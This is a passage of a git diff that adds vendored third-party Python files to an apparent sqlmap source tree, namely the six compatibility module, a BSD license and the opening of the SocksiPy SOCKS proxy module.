target=None): + if fullname in self.known_modules: + return spec_from_loader(fullname, self) + return None + + def __get_module(self, fullname): + try: + return self.known_modules[fullname] + except KeyError: + raise ImportError("This loader does not know module " + fullname) + + def load_module(self, fullname): + try: + # in case of a reload + return sys.modules[fullname] + except KeyError: + pass + mod = self.__get_module(fullname) + if isinstance(mod, MovedModule): + mod = mod._resolve() + else: + mod.__loader__ = self + sys.modules[fullname] = mod + return mod + + def is_package(self, fullname): + """ + Return true, if the named module is a package. + + We need this method to get correct spec objects with + Python 3.4 (see PEP451) + """ + return hasattr(self.__get_module(fullname), "__path__") + + def get_code(self, fullname): + """Return None + + Required, if is_package is implemented""" + self.__get_module(fullname) # eventually raises ImportError + return None + get_source = get_code # same as get_code + + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass + +_importer = _SixMetaPathImporter(__name__) + + +class _MovedItems(_LazyModule): + + """Lazy loading of moved objects""" + __path__ = [] # mark as package + + +_moved_attributes = [ + MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), + MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), + MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"), + MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), + MovedAttribute("intern", "__builtin__", "sys"), + MovedAttribute("map", "itertools", "builtins", "imap", "map"), + MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), + MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), + MovedAttribute("getoutput", "commands", "subprocess"), + MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"), + MovedAttribute("reduce", "__builtin__", "functools"), + MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), + MovedAttribute("StringIO", "StringIO", "io"), + MovedAttribute("UserDict", "UserDict", "collections", "IterableUserDict", "UserDict"), + MovedAttribute("UserList", "UserList", "collections"), + MovedAttribute("UserString", "UserString", "collections"), + MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), + MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"), + MovedModule("builtins", "__builtin__"), + MovedModule("configparser", "ConfigParser"), + MovedModule("collections_abc", "collections", "collections.abc" if sys.version_info >= (3, 3) else "collections"), + MovedModule("copyreg", "copy_reg"), + MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), + MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), + MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread" if sys.version_info < (3, 9) else "_thread"), + MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), + MovedModule("http_cookies", "Cookie", "http.cookies"), + MovedModule("html_entities", "htmlentitydefs", "html.entities"), + MovedModule("html_parser", "HTMLParser", "html.parser"), + MovedModule("http_client", "httplib", "http.client"), + MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), + MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), + MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), + MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"), + MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), + MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), + MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), + MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"), + MovedModule("cPickle", "cPickle", "pickle"), + MovedModule("queue", "Queue"), + MovedModule("reprlib", "repr"), + MovedModule("socketserver", "SocketServer"), + MovedModule("_thread", "thread", "_thread"), + MovedModule("tkinter", "Tkinter"), + MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), + MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), + MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), + MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), + MovedModule("tkinter_tix", "Tix", "tkinter.tix"), + MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), + MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), + MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"), + MovedModule("tkinter_colorchooser", "tkColorChooser", + "tkinter.colorchooser"), + MovedModule("tkinter_commondialog", "tkCommonDialog", + "tkinter.commondialog"), + MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"), + MovedModule("tkinter_font", "tkFont", "tkinter.font"), + MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), + MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", + "tkinter.simpledialog"), + MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), + MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), + MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), + MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), + MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), + MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), +] +# Add windows specific modules. +if sys.platform == "win32": + _moved_attributes += [ + MovedModule("winreg", "_winreg"), + ] + +for attr in _moved_attributes: + setattr(_MovedItems, attr.name, attr) + if isinstance(attr, MovedModule): + _importer._add_module(attr, "moves." + attr.name) +del attr + +_MovedItems._moved_attributes = _moved_attributes + +moves = _MovedItems(__name__ + ".moves") +_importer._add_module(moves, "moves") + + +class Module_six_moves_urllib_parse(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_parse""" + + +_urllib_parse_moved_attributes = [ + MovedAttribute("ParseResult", "urlparse", "urllib.parse"), + MovedAttribute("SplitResult", "urlparse", "urllib.parse"), + MovedAttribute("parse_qs", "urlparse", "urllib.parse"), + MovedAttribute("parse_qsl", "urlparse", "urllib.parse"), + MovedAttribute("urldefrag", "urlparse", "urllib.parse"), + MovedAttribute("urljoin", "urlparse", "urllib.parse"), + MovedAttribute("urlparse", "urlparse", "urllib.parse"), + MovedAttribute("urlsplit", "urlparse", "urllib.parse"), + MovedAttribute("urlunparse", "urlparse", "urllib.parse"), + MovedAttribute("urlunsplit", "urlparse", "urllib.parse"), + MovedAttribute("quote", "urllib", "urllib.parse"), + MovedAttribute("quote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote", "urllib", "urllib.parse"), + MovedAttribute("unquote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes"), + MovedAttribute("urlencode", "urllib", "urllib.parse"), + MovedAttribute("splitquery", "urllib", "urllib.parse"), + MovedAttribute("splittag", "urllib", "urllib.parse"), + MovedAttribute("splituser", "urllib", "urllib.parse"), + MovedAttribute("splitvalue", "urllib", "urllib.parse"), + MovedAttribute("uses_fragment", "urlparse", "urllib.parse"), + MovedAttribute("uses_netloc", "urlparse", "urllib.parse"), + MovedAttribute("uses_params", "urlparse", "urllib.parse"), + MovedAttribute("uses_query", "urlparse", "urllib.parse"), + MovedAttribute("uses_relative", "urlparse", "urllib.parse"), +] +for attr in _urllib_parse_moved_attributes: + setattr(Module_six_moves_urllib_parse, attr.name, attr) +del attr + +Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes + +_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), + "moves.urllib_parse", "moves.urllib.parse") + + +class Module_six_moves_urllib_error(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_error""" + + +_urllib_error_moved_attributes = [ + MovedAttribute("URLError", "urllib2", "urllib.error"), + MovedAttribute("HTTPError", "urllib2", "urllib.error"), + MovedAttribute("ContentTooShortError", "urllib", "urllib.error"), +] +for attr in _urllib_error_moved_attributes: + setattr(Module_six_moves_urllib_error, attr.name, attr) +del attr + +Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes + +_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), + "moves.urllib_error", "moves.urllib.error") + + +class Module_six_moves_urllib_request(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_request""" + + +_urllib_request_moved_attributes = [ + MovedAttribute("urlopen", "urllib2", "urllib.request"), + MovedAttribute("install_opener", "urllib2", "urllib.request"), + MovedAttribute("build_opener", "urllib2", "urllib.request"), + MovedAttribute("pathname2url", "urllib", "urllib.request"), + MovedAttribute("url2pathname", "urllib", "urllib.request"), + MovedAttribute("getproxies", "urllib", "urllib.request"), + MovedAttribute("Request", "urllib2", "urllib.request"), + MovedAttribute("OpenerDirector", "urllib2", "urllib.request"), + MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"), + MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), + MovedAttribute("BaseHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), + MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"), + MovedAttribute("FileHandler", "urllib2", "urllib.request"), + MovedAttribute("FTPHandler", "urllib2", "urllib.request"), + MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"), + MovedAttribute("UnknownHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"), + MovedAttribute("urlretrieve", "urllib", "urllib.request"), + MovedAttribute("urlcleanup", "urllib", "urllib.request"), + MovedAttribute("URLopener", "urllib", "urllib.request"), + MovedAttribute("FancyURLopener", "urllib", "urllib.request"), + MovedAttribute("proxy_bypass", "urllib", "urllib.request"), + MovedAttribute("parse_http_list", "urllib2", "urllib.request"), + MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), +] +for attr in _urllib_request_moved_attributes: + setattr(Module_six_moves_urllib_request, attr.name, attr) +del attr + +Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes + +_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), + "moves.urllib_request", "moves.urllib.request") + + +class Module_six_moves_urllib_response(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_response""" + + +_urllib_response_moved_attributes = [ + MovedAttribute("addbase", "urllib", "urllib.response"), + MovedAttribute("addclosehook", "urllib", "urllib.response"), + MovedAttribute("addinfo", "urllib", "urllib.response"), + MovedAttribute("addinfourl", "urllib", "urllib.response"), +] +for attr in _urllib_response_moved_attributes: + setattr(Module_six_moves_urllib_response, attr.name, attr) +del attr + +Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes + +_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), + "moves.urllib_response", "moves.urllib.response") + + +class Module_six_moves_urllib_robotparser(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_robotparser""" + + +_urllib_robotparser_moved_attributes = [ + MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"), +] +for attr in _urllib_robotparser_moved_attributes: + setattr(Module_six_moves_urllib_robotparser, attr.name, attr) +del attr + +Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes + +_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), + "moves.urllib_robotparser", "moves.urllib.robotparser") + + +class Module_six_moves_urllib(types.ModuleType): + + """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" + __path__ = [] # mark as package + parse = _importer._get_module("moves.urllib_parse") + error = _importer._get_module("moves.urllib_error") + request = _importer._get_module("moves.urllib_request") + response = _importer._get_module("moves.urllib_response") + robotparser = _importer._get_module("moves.urllib_robotparser") + + def __dir__(self): + return ['parse', 'error', 'request', 'response', 'robotparser'] + +_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"), + "moves.urllib") + + +def add_move(move): + """Add an item to six.moves.""" + setattr(_MovedItems, move.name, move) + + +def remove_move(name): + """Remove item from six.moves.""" + try: + delattr(_MovedItems, name) + except AttributeError: + try: + del moves.__dict__[name] + except KeyError: + raise AttributeError("no such move, %r" % (name,)) + + +if PY3: + _meth_func = "__func__" + _meth_self = "__self__" + + _func_closure = "__closure__" + _func_code = "__code__" + _func_defaults = "__defaults__" + _func_globals = "__globals__" +else: + _meth_func = "im_func" + _meth_self = "im_self" + + _func_closure = "func_closure" + _func_code = "func_code" + _func_defaults = "func_defaults" + _func_globals = "func_globals" + + +try: + advance_iterator = next +except NameError: + def advance_iterator(it): + return it.next() +next = advance_iterator + + +try: + callable = callable +except NameError: + def callable(obj): + return any("__call__" in klass.__dict__ for klass in type(obj).__mro__) + + +if PY3: + def get_unbound_function(unbound): + return unbound + + create_bound_method = types.MethodType + + def create_unbound_method(func, cls): + return func + + Iterator = object +else: + def get_unbound_function(unbound): + return unbound.im_func + + def create_bound_method(func, obj): + return types.MethodType(func, obj, obj.__class__) + + def create_unbound_method(func, cls): + return types.MethodType(func, None, cls) + + class Iterator(object): + + def next(self): + return type(self).__next__(self) + + callable = callable +_add_doc(get_unbound_function, + """Get the function out of a possibly unbound function""") + + +get_method_function = operator.attrgetter(_meth_func) +get_method_self = operator.attrgetter(_meth_self) +get_function_closure = operator.attrgetter(_func_closure) +get_function_code = operator.attrgetter(_func_code) +get_function_defaults = operator.attrgetter(_func_defaults) +get_function_globals = operator.attrgetter(_func_globals) + + +if PY3: + def iterkeys(d, **kw): + return iter(d.keys(**kw)) + + def itervalues(d, **kw): + return iter(d.values(**kw)) + + def iteritems(d, **kw): + return iter(d.items(**kw)) + + def iterlists(d, **kw): + return iter(d.lists(**kw)) + + viewkeys = operator.methodcaller("keys") + + viewvalues = operator.methodcaller("values") + + viewitems = operator.methodcaller("items") +else: + def iterkeys(d, **kw): + return d.iterkeys(**kw) + + def itervalues(d, **kw): + return d.itervalues(**kw) + + def iteritems(d, **kw): + return d.iteritems(**kw) + + def iterlists(d, **kw): + return d.iterlists(**kw) + + viewkeys = operator.methodcaller("viewkeys") + + viewvalues = operator.methodcaller("viewvalues") + + viewitems = operator.methodcaller("viewitems") + +_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.") +_add_doc(itervalues, "Return an iterator over the values of a dictionary.") +_add_doc(iteritems, + "Return an iterator over the (key, value) pairs of a dictionary.") +_add_doc(iterlists, + "Return an iterator over the (key, [values]) pairs of a dictionary.") + + +if PY3: + def b(s): + return s.encode("latin-1") + + def u(s): + return s + unichr = chr + import struct + int2byte = struct.Struct(">B").pack + del struct + byte2int = operator.itemgetter(0) + indexbytes = operator.getitem + iterbytes = iter + import io + StringIO = io.StringIO + BytesIO = io.BytesIO + del io + _assertCountEqual = "assertCountEqual" + if sys.version_info[1] <= 1: + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" + else: + _assertRaisesRegex = "assertRaisesRegex" + _assertRegex = "assertRegex" + _assertNotRegex = "assertNotRegex" +else: + def b(s): + return s + # Workaround for standalone backslash + + def u(s): + return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape") + unichr = unichr + int2byte = chr + + def byte2int(bs): + return ord(bs[0]) + + def indexbytes(buf, i): + return ord(buf[i]) + iterbytes = functools.partial(itertools.imap, ord) + import StringIO + StringIO = BytesIO = StringIO.StringIO + _assertCountEqual = "assertItemsEqual" + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" +_add_doc(b, """Byte literal""") +_add_doc(u, """Text literal""") + + +def assertCountEqual(self, *args, **kwargs): + return getattr(self, _assertCountEqual)(*args, **kwargs) + + +def assertRaisesRegex(self, *args, **kwargs): + return getattr(self, _assertRaisesRegex)(*args, **kwargs) + + +def assertRegex(self, *args, **kwargs): + return getattr(self, _assertRegex)(*args, **kwargs) + + +def assertNotRegex(self, *args, **kwargs): + return getattr(self, _assertNotRegex)(*args, **kwargs) + + +if PY3: + exec_ = getattr(moves.builtins, "exec") + + def reraise(tp, value, tb=None): + try: + if value is None: + value = tp() + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + finally: + value = None + tb = None + +else: + def exec_(_code_, _globs_=None, _locs_=None): + """Execute code in a namespace.""" + if _globs_ is None: + frame = sys._getframe(1) + _globs_ = frame.f_globals + if _locs_ is None: + _locs_ = frame.f_locals + del frame + elif _locs_ is None: + _locs_ = _globs_ + exec("""exec _code_ in _globs_, _locs_""") + + exec_("""def reraise(tp, value, tb=None): + try: + raise tp, value, tb + finally: + tb = None +""") + + +if sys.version_info[:2] > (3,): + exec_("""def raise_from(value, from_value): + try: + raise value from from_value + finally: + value = None +""") +else: + def raise_from(value, from_value): + raise value + + +print_ = getattr(moves.builtins, "print", None) +if print_ is None: + def print_(*args, **kwargs): + """The new-style print function for Python 2.4 and 2.5.""" + fp = kwargs.pop("file", sys.stdout) + if fp is None: + return + + def write(data): + if not isinstance(data, basestring): + data = str(data) + # If the file has an encoding, encode unicode with it. + if (isinstance(fp, file) and + isinstance(data, unicode) and + fp.encoding is not None): + errors = getattr(fp, "errors", None) + if errors is None: + errors = "strict" + data = data.encode(fp.encoding, errors) + fp.write(data) + want_unicode = False + sep = kwargs.pop("sep", None) + if sep is not None: + if isinstance(sep, unicode): + want_unicode = True + elif not isinstance(sep, str): + raise TypeError("sep must be None or a string") + end = kwargs.pop("end", None) + if end is not None: + if isinstance(end, unicode): + want_unicode = True + elif not isinstance(end, str): + raise TypeError("end must be None or a string") + if kwargs: + raise TypeError("invalid keyword arguments to print()") + if not want_unicode: + for arg in args: + if isinstance(arg, unicode): + want_unicode = True + break + if want_unicode: + newline = unicode("\n") + space = unicode(" ") + else: + newline = "\n" + space = " " + if sep is None: + sep = space + if end is None: + end = newline + for i, arg in enumerate(args): + if i: + write(sep) + write(arg) + write(end) +if sys.version_info[:2] < (3, 3): + _print = print_ + + def print_(*args, **kwargs): + fp = kwargs.get("file", sys.stdout) + flush = kwargs.pop("flush", False) + _print(*args, **kwargs) + if flush and fp is not None: + fp.flush() + +_add_doc(reraise, """Reraise an exception.""") + +if sys.version_info[0:2] < (3, 4): + # This does exactly the same what the :func:`py3:functools.update_wrapper` + # function does on Python versions after 3.2. It sets the ``__wrapped__`` + # attribute on ``wrapper`` object and it doesn't raise an error if any of + # the attributes mentioned in ``assigned`` and ``updated`` are missing on + # ``wrapped`` object. + def _update_wrapper(wrapper, wrapped, + assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + for attr in assigned: + try: + value = getattr(wrapped, attr) + except AttributeError: + continue + else: + setattr(wrapper, attr, value) + for attr in updated: + getattr(wrapper, attr).update(getattr(wrapped, attr, {})) + wrapper.__wrapped__ = wrapped + return wrapper + _update_wrapper.__doc__ = functools.update_wrapper.__doc__ + + def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + return functools.partial(_update_wrapper, wrapped=wrapped, + assigned=assigned, updated=updated) + wraps.__doc__ = functools.wraps.__doc__ + +else: + wraps = functools.wraps + + +def with_metaclass(meta, *bases): + """Create a base class with a metaclass.""" + # This requires a bit of explanation: the basic idea is to make a dummy + # metaclass for one level of class instantiation that replaces itself with + # the actual metaclass. + class metaclass(type): + + def __new__(cls, name, this_bases, d): + if sys.version_info[:2] >= (3, 7): + # This version introduced PEP 560 that requires a bit + # of extra care (we mimic what is done by __build_class__). + resolved_bases = types.resolve_bases(bases) + if resolved_bases is not bases: + d['__orig_bases__'] = bases + else: + resolved_bases = bases + return meta(name, resolved_bases, d) + + @classmethod + def __prepare__(cls, name, this_bases): + return meta.__prepare__(name, bases) + return type.__new__(metaclass, 'temporary_class', (), {}) + + +def add_metaclass(metaclass): + """Class decorator for creating a class with a metaclass.""" + def wrapper(cls): + orig_vars = cls.__dict__.copy() + slots = orig_vars.get('__slots__') + if slots is not None: + if isinstance(slots, str): + slots = [slots] + for slots_var in slots: + orig_vars.pop(slots_var) + orig_vars.pop('__dict__', None) + orig_vars.pop('__weakref__', None) + if hasattr(cls, '__qualname__'): + orig_vars['__qualname__'] = cls.__qualname__ + return metaclass(cls.__name__, cls.__bases__, orig_vars) + return wrapper + + +def ensure_binary(s, encoding='utf-8', errors='strict'): + """Coerce **s** to six.binary_type. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> encoded to `bytes` + - `bytes` -> `bytes` + """ + if isinstance(s, binary_type): + return s + if isinstance(s, text_type): + return s.encode(encoding, errors) + raise TypeError("not expecting type '%s'" % type(s)) + + +def ensure_str(s, encoding='utf-8', errors='strict'): + """Coerce *s* to `str`. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + # Optimization: Fast return for the common case. + if type(s) is str: + return s + if PY2 and isinstance(s, text_type): + return s.encode(encoding, errors) + elif PY3 and isinstance(s, binary_type): + return s.decode(encoding, errors) + elif not isinstance(s, (text_type, binary_type)): + raise TypeError("not expecting type '%s'" % type(s)) + return s + + +def ensure_text(s, encoding='utf-8', errors='strict'): + """Coerce *s* to six.text_type. + + For Python 2: + - `unicode` -> `unicode` + - `str` -> `unicode` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + if isinstance(s, binary_type): + return s.decode(encoding, errors) + elif isinstance(s, text_type): + return s + else: + raise TypeError("not expecting type '%s'" % type(s)) + + +def python_2_unicode_compatible(klass): + """ + A class decorator that defines __unicode__ and __str__ methods under Python 2. + Under Python 3 it does nothing. + + To support Python 2 and 3 with a single code base, define a __str__ method + returning text and apply this decorator to the class. + """ + if PY2: + if '__str__' not in klass.__dict__: + raise ValueError("@python_2_unicode_compatible cannot be applied " + "to %s because it doesn't define __str__()." % + klass.__name__) + klass.__unicode__ = klass.__str__ + klass.__str__ = lambda self: self.__unicode__().encode('utf-8') + return klass + + +# Complete the moves implementation. +# This code is at the end of this module to speed up module loading. +# Turn this module into a package. +__path__ = [] # required for PEP 302 and PEP 451 +__package__ = __name__ # see PEP 366 @ReservedAssignment +if globals().get("__spec__") is not None: + __spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable +# Remove other six meta path importers, since they cause problems. This can +# happen if six is removed from sys.modules and then reloaded. (Setuptools does +# this for some reason.) +if sys.meta_path: + for i, importer in enumerate(sys.meta_path): + # Here's some real nastiness: Another "instance" of the six module might + # be floating around. Therefore, we can't use isinstance() to check for + # the six meta path importer, since the other six instance will have + # inserted an importer with different class. + if (type(importer).__name__ == "_SixMetaPathImporter" and + importer.name == __name__): + del sys.meta_path[i] + break + del i, importer +# Finally, add the importer to the meta path import hook. +sys.meta_path.append(_importer) diff --git a/src/sqlmap-master/thirdparty/socks/LICENSE b/src/sqlmap-master/thirdparty/socks/LICENSE new file mode 100644 index 0000000..04b6b1f --- /dev/null +++ b/src/sqlmap-master/thirdparty/socks/LICENSE @@ -0,0 +1,22 @@ +Copyright 2006 Dan-Haim. All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +3. Neither the name of Dan Haim nor the names of his contributors may be used + to endorse or promote products derived from this software without specific + prior written permission. + +THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED +WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO +EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, +INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA +OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT +OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE. diff --git a/src/sqlmap-master/thirdparty/socks/__init__.py b/src/sqlmap-master/thirdparty/socks/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/sqlmap-master/thirdparty/socks/socks.py b/src/sqlmap-master/thirdparty/socks/socks.py new file mode 100644 index 0000000..4005cab --- /dev/null +++ b/src/sqlmap-master/thirdparty/socks/socks.py @@ -0,0 +1,413 @@ +#!/usr/bin/env python + +"""SocksiPy - Python SOCKS module. +Version 1.00 + +Copyright 2006 Dan-Haim. All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +3. Neither the name of Dan Haim nor the names of his contributors may be used + to endorse or promote products derived from this software without specific + prior written permission. + +THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED +WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO +EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, +INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA +OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT +OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE. + + +This module provides a standard socket-like interface for Python +for tunneling connections through SOCKS proxies. + +""" + +""" +Minor modifications made by Miroslav Stampar (https://sqlmap.org/) +for patching DNS-leakage occuring in socket.create_connection() + +Minor modifications made by Christopher Gilbert (http://motomastyle.com/) +for use in PyLoris (http://pyloris.sourceforge.net/) + +Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/) +mainly to merge bug fixes found in Sourceforge + +""" + +import socket +import struct + +PROXY_TYPE_SOCKS4 = 1 +PROXY_TYPE_SOCKS5 = 2 +PROXY_TYPE_HTTP = 3 + +_defaultproxy = None +socket._orig_socket = _orgsocket = _orig_socket = socket.socket +_orgcreateconnection = socket.create_connection + +class ProxyError(Exception): pass +class GeneralProxyError(ProxyError): pass +class Socks5AuthError(ProxyError): pass +class Socks5Error(ProxyError): pass +class Socks4Error(ProxyError): pass +class HTTPError(ProxyError): pass + +_generalerrors = ("success", + "invalid data", + "not connected", + "not available", + "bad proxy type", + "bad input") + +_socks5errors = ("succeeded", + "general SOCKS server failure", + "connection not allowed by ruleset", + "Network unreachable", + "Host unreachable", + "Connection refused", + "TTL expired", + "Command not supported", + "Address type not supported", + "Unknown error") + +_socks5autherrors = ("succeeded", + "authentication is required", + "all offered authentication methods were rejected", + "unknown username or invalid password", + "unknown error") + +_socks4errors = ("request granted", + "request rejected or failed", + "request rejected because SOCKS server cannot connect to identd on the client", + "request rejected because the client program and identd report different user-ids", + "unknown error") + +def setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None): + """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) + Sets a default proxy which all further socksocket objects will use, + unless explicitly changed. + """ + global _defaultproxy + _defaultproxy = (proxytype, addr, port, rdns, username, password) + +def wrapmodule(module): + """wrapmodule(module) + Attempts to replace a module's socket library with a SOCKS socket. Must set + a default proxy using setdefaultproxy(...) first. + This will only work on modules that import socket directly into the namespace; + most of the Python Standard Library falls into this category. + """ + if _defaultproxy != None: + module.socket.socket = socksocket + if _defaultproxy[0] == PROXY_TYPE_SOCKS4: + # Note: unable to prevent DNS leakage in SOCKS4 (Reference: https://security.stackexchange.com/a/171280) + pass + else: + module.socket.create_connection = create_connection + else: + raise GeneralProxyError((4, "no proxy specified")) + +def unwrapmodule(module): + module.socket.socket = _orgsocket + module.socket.create_connection = _orgcreateconnection + +class socksocket(socket.socket): + """socksocket([family[, type[, proto]]]) -> socket object + Open a SOCKS enabled socket. The parameters are the same as + those of the standard socket init. In order for SOCKS to work, + you must specify family=AF_INET, type=SOCK_STREAM and proto=0. + """ + + def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None): + _orgsocket.__init__(self, family, type, proto, _sock) + if _defaultproxy != None: + self.__proxy = _defaultproxy + else: + self.__proxy = (None, None, None, None, None, 